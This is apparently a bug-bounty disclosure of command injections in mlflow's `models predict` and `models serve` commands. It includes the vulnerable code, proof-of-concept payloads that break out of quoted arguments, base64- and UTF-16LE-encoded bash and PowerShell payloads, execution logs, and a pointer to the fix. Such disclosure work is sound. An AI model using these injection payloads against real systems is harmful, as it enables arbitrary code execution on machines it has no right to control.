Multiple command injections in `mlflow models` CLI actions in mlflow/mlflow
Reported on
Apr 30th 2023
Description
The `mlflow` CLI executable is vulnerable to command injection in the `mlflow models predict` and `mlflow models serve` actions. Both actions are defined in the file `mlflow/models/cli.py`, and they call the vulnerable `predict` and `serve` methods, respectively, of a dynamically resolved instance of the `PyFuncBackend` class, defined in `mlflow/pyfunc/backend.py`.
[Bug 1] `mlflow models predict` command injection
The code of the `PyFuncBackend.predict` method can be seen below:
```python
def predict(self, model_uri, input_path, output_path, content_type):
    """
    Generate predictions using generic python model saved with MLflow. The expected format of
    the input JSON is the Mlflow scoring format.
    Return the prediction results as a JSON.
    """
    local_path = _download_artifact_from_uri(model_uri)
    # NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
    # platform compatibility.
    local_uri = path_to_local_file_uri(local_path)
    if self._env_manager != _EnvManager.LOCAL:
        command = (
            'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
            "model_uri={model_uri}, "
            "input_path={input_path}, "
            "output_path={output_path}, "
            "content_type={content_type})"
            '"'
        ).format(
            model_uri=repr(local_uri),
            input_path=repr(input_path),
            output_path=repr(output_path),
            content_type=repr(content_type),
        )
        return self.prepare_env(local_path).execute(command)
    else:
        scoring_server._predict(local_uri, input_path, output_path, content_type)
```
The application dynamically constructs a shell command by interpolating user input into predefined placeholders, and passes it to the `mlflow.utils.Environment.execute` method, which runs the resulting console command.
The application uses the built-in Python function `repr` to add quotes around the user input. However, `repr` does not prevent an attacker from injecting a double quote into the CLI parameters to escape the `python -c "..."` argument, as the following example shows:
```python
>>> local_uri='LOCAL_URI'
>>> input_path='INPUT_PATH'
>>> output_path='OUTPUT_PATH'
>>> content_type='injection poc"; we are free now; echo "escape the rest'
>>> command = (
...     'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
...     "model_uri={model_uri}, "
...     "input_path={input_path}, "
...     "output_path={output_path}, "
...     "content_type={content_type})"
...     '"'
... ).format(
...     model_uri=repr(local_uri),
...     input_path=repr(input_path),
...     output_path=repr(output_path),
...     content_type=repr(content_type),
... )
>>> print(command)
python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='LOCAL_URI', input_path='INPUT_PATH', output_path='OUTPUT_PATH', content_type='injection poc"; we are free now; echo "escape the rest')"
```
Thus, it is possible to inject arbitrary commands into the parameters of the `mlflow models predict` command and obtain unintended code execution.
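The escape is not merely syntactic: `Environment.execute` runs the formatted string via `['bash', '-c', command]` (as the PoC logs later in this report show), so the injected fragment actually executes. A minimal standalone reproduction of the pattern (not mlflow code; assumes a system with `bash`):

```python
import subprocess

# Same repr()-based formatting as PyFuncBackend.predict, reduced to one field.
content_type = 'json"; echo INJECTED; echo "'
command = 'python -c "print({content_type})"'.format(content_type=repr(content_type))

# The double quote inside the payload terminates the -c argument early, so
# bash runs the injected `echo INJECTED` as a separate command.
result = subprocess.run(["bash", "-c", command], capture_output=True, text=True)
print(result.stdout)  # stdout contains the line "INJECTED"
```

The truncated `python -c` command fails with a `SyntaxError` on stderr, exactly as in the PoC logs, while the injected command still runs.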
[Bug 2] `mlflow models serve` command injection
The code of the vulnerable `PyFuncBackend.serve` method can be seen below:
```python
def serve(
    self,
    model_uri,
    port,
    host,
    timeout,
    enable_mlserver,
    synchronous=True,
    stdout=None,
    stderr=None,
):  # pylint: disable=W0221
    """
    Serve pyfunc model locally.
    """
    local_path = _download_artifact_from_uri(model_uri)
    server_implementation = mlserver if enable_mlserver else scoring_server
    command, command_env = server_implementation.get_cmd(
        local_path, port, host, timeout, self._nworkers
    )
    ...
    if self._env_manager != _EnvManager.LOCAL:
        return self.prepare_env(local_path).execute(
            command,
            command_env,
            stdout=stdout,
            stderr=stderr,
            preexec_fn=setup_sigterm_on_parent_death,
            synchronous=synchronous,
        )
    else:
        _logger.info("=== Running command '%s'", command)
        if os.name != "nt":
            command = ["bash", "-c", command]
        child_proc = subprocess.Popen(
            command,
            env=command_env,
            preexec_fn=setup_sigterm_on_parent_death,
            stdout=stdout,
            stderr=stderr,
        )
    ...
```
The above uses the `get_cmd` function, defined in `mlflow/pyfunc/scoring_server/__init__.py`, which formats user input directly into a command string:
```python
def get_cmd(
    model_uri: str, port: int = None, host: int = None, timeout: int = None, nworkers: int = None
) -> Tuple[str, Dict[str, str]]:
    local_uri = path_to_local_file_uri(model_uri)
    timeout = timeout or MLFLOW_SCORING_SERVER_REQUEST_TIMEOUT.get()
    # NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
    # platform compatibility.
    if os.name != "nt":
        args = [f"--timeout={timeout}"]
        if port and host:
            args.append(f"-b {host}:{port}")
        elif host:
            args.append(f"-b {host}")
        if nworkers:
            args.append(f"-w {nworkers}")
        command = (
            f"gunicorn {' '.join(args)} ${{GUNICORN_CMD_ARGS}}"
            " -- mlflow.pyfunc.scoring_server.wsgi:app"
        )
    else:
        args = []
        if host:
            args.append(f"--host={host}")
        if port:
            args.append(f"--port={port}")
        command = (
            f"waitress-serve {' '.join(args)} "
            "--ident=mlflow mlflow.pyfunc.scoring_server.wsgi:app"
        )
    command_env = os.environ.copy()
    command_env[_SERVER_MODEL_PATH] = local_uri
    return command, command_env
```
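The non-Windows branch above can be replayed standalone with a hostile `--host` value to see the injection land in the gunicorn command line (a sketch, not mlflow code; it reproduces only the string formatting, not the environment handling):

```python
# Replaying the os.name != "nt" branch of get_cmd with attacker-controlled host.
host, port, timeout, nworkers = "localhost & id & localhost", 80, 60, 1

args = [f"--timeout={timeout}", f"-b {host}:{port}", f"-w {nworkers}"]
command = (
    f"gunicorn {' '.join(args)} ${{GUNICORN_CMD_ARGS}}"
    " -- mlflow.pyfunc.scoring_server.wsgi:app"
)
# The `& id &` sequence survives verbatim; once serve() wraps this string in
# ['bash', '-c', ...], `id` runs as its own command.
print(command)
```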
Proof of Concept
Install required dependencies
Install the latest version of mlflow:

```shell
pip install mlflow
```

Install `pyenv` or `conda` (prerequisites to get the `mlflow models predict` command to work with non-local environments).

OR

Setup mlflow environment
Clone the mlflow repository into a local directory:

```shell
git clone https://github.com/mlflow/mlflow
```

Run one of the example mlflow scripts that saves a model, e.g. `examples/sklearn_logistic_regression/train.py`, to populate the `mlruns` directory:

```shell
cd mlflow/examples/sklearn_logistic_regression
python train.py
```

List the files inside the `mlruns/0/` directory to get a valid run ID:

```shell
ls -l mlruns/0/
total 8
drwxrwxr-x 6 ubuntu ubuntu 4096 Apr 29 19:28 330068e1dfcf43cb8f1cd0e86038d781 # use this id
-rw-rw-r-- 1 ubuntu ubuntu 227 Apr 29 19:28 meta.yaml
```
[Bug 1] Exploitation
Insert the payload below into the input path (`-i`), output path (`-o`), or content type (`-t`) parameter:

```
"; YOUR COMMAND HERE; echo "
```

For example:

```shell
mlflow models predict -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -i 'test"; id; echo "' -o test
2023/04/29 19:48:00 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; id; echo "\', output_path=\'test\', content_type=\'json\')"']'
  File "<string>", line 1
    from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
                                                                                                                                                                                                                                  ^
SyntaxError: unterminated string literal (detected at line 1)
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')
```
If you want to run more advanced commands that require quotes, encode your input beforehand.
Injecting advanced payloads for Linux & the virtualenv env manager:

```shell
# encode a payload that echoes "hello from mlflow rce" and runs "id" (--env-manager virtualenv)
echo 'echo "hello from mlflow rce!"; id;' | base64
# encoded payload
ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo=
# poc
$ mlflow models predict -m 'runs:/RUN_ID/model/' -i 'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "' -o test
2023/04/29 20:09:37 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "\', output_path=\'test\', content_type=\'json\')"']'
  File "<string>", line 1
    from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
                                                                                                                                                                                                                                  ^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce!
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')
```
Injecting advanced payloads for Windows & the conda env manager:

```shell
# example of encoding a payload to echo "hello from mlflow rce" & run "whoami /all"
https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-16LE%20(1200)')To_Base64('A-Za-z0-9%2B/%3D')&input=ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlIjsgd2hvYW1pIC9hbGw
# encoded payload
ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA==
```
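The CyberChef step can also be reproduced with a few lines of Python: `powershell -ec` (`-EncodedCommand`) expects the command base64-encoded as UTF-16LE rather than UTF-8 (the payload below is the same illustrative one used above):

```python
import base64

# powershell -EncodedCommand consumes base64 over UTF-16LE bytes, not UTF-8.
payload = 'echo "hello from mlflow rce"; whoami /all'
encoded = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")
print(encoded)
```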
```shell
# poc
(base) C:\Temp\mlflow\examples\sklearn_logistic_regression>mlflow models predict --env-manager conda -m mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model -i "test"" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo "" " -o test -t json
C:\Users\Strawberry\miniconda3\lib\site-packages\click\core.py:2322: UserWarning: Use of conda is discouraged. If you use it, please ensure that your use of conda complies with Anaconda's terms of service (https://legal.anaconda.com/policies/en/?name=terms-of-service). virtualenv is the recommended tool for environment reproducibility. To suppress this warning, set the MLFLOW_DISABLE_ENV_MANAGER_CONDA_WARNING (default: False, type: bool) environment variable to 'TRUE'.
  value = self.callback(ctx, self, value)
2023/04/30 02:32:40 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 02:32:43 INFO mlflow.utils.conda: Conda environment mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e already exists.
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c ""']'
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model\', input_path=\'test" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo " \', output_path=\'test\', content_type=\'json\')"']'
  File "<string>", line 1
    "from
    ^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce

USER INFORMATION
----------------
User Name                  SID
========================== =============================================
desktop-0gd1eqg\strawberry S-1-5-21-2872549777-3506415077-326829181-1001

GROUP INFORMATION
-----------------
Group Name                                                    Type             SID                                           Attributes
============================================================= ================ ============================================= ==================================================
Everyone                                                      Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114                                     Group used for deny only
DESKTOP-0GD1EQG\docker-users                                  Alias            S-1-5-21-2872549777-3506415077-326829181-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544                                  Group used for deny only
BUILTIN\Hyper-V Administrators                                Alias            S-1-5-32-578                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users                                 Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
\" ', output_path='test', content_type='json')\"
```
[Bug 2] Exploitation
Insert the command injection payload into the `-h` (`--host`) parameter:
```shell
mlflow models serve -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -p '80' -h 'localhost & id & localhost'
2023/04/30 11:51:07 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && exec gunicorn --timeout=60 -b localhost & id & localhost:80 -w 1 ${GUNICORN_CMD_ARGS} -- mlflow.pyfunc.scoring_server.wsgi:app']'
...
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
...
```
Impact
An attacker can execute arbitrary OS commands by injecting malicious input into the CLI arguments of the `models predict` and `models serve` actions of the `mlflow` executable. This vulnerability can be leveraged to gain a foothold on a vulnerable machine, or to attempt local privilege escalation if a restricted way of invoking the `mlflow` executable is obtained.
Occurrences
backend.py L162
Code of the vulnerable `PyFuncBackend.serve` method
backend.py L133
Code of the vulnerable `PyFuncBackend.predict` method
Upon further investigation, it seems that numerous methods of the `PyFuncBackend` and `RFuncBackend` classes are vulnerable to similar command injections. I will try to write them up as soon as possible and group them in this report.
Updated the description to include the second discovered command injection in `PyFuncBackend`. `RFuncBackend` is still in progress.
@admin, can we add a co-author to this report? https://huntr.dev/users/nashkersk/
Also, this vulnerability was fixed in https://github.com/mlflow/mlflow/pull/9053 by @serena-ruan
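For reference, a common mitigation for this class of bug (not necessarily the exact approach taken in the PR above) is to avoid building shell strings from untrusted values, or to quote each value with `shlex.quote` before interpolation. A minimal sketch, reusing the Bug 1 payload (assumes a system with `bash`):

```python
import shlex
import subprocess

payload = 'json"; echo INJECTED; echo "'

# shlex.quote() yields a single shell-safe token, unlike repr(), whose
# Python-level quotes can be broken out of with a double quote.
command = "echo content_type={}".format(shlex.quote(payload))
result = subprocess.run(["bash", "-c", command], capture_output=True, text=True)
print(result.stdout)  # the whole payload is echoed back as inert data
```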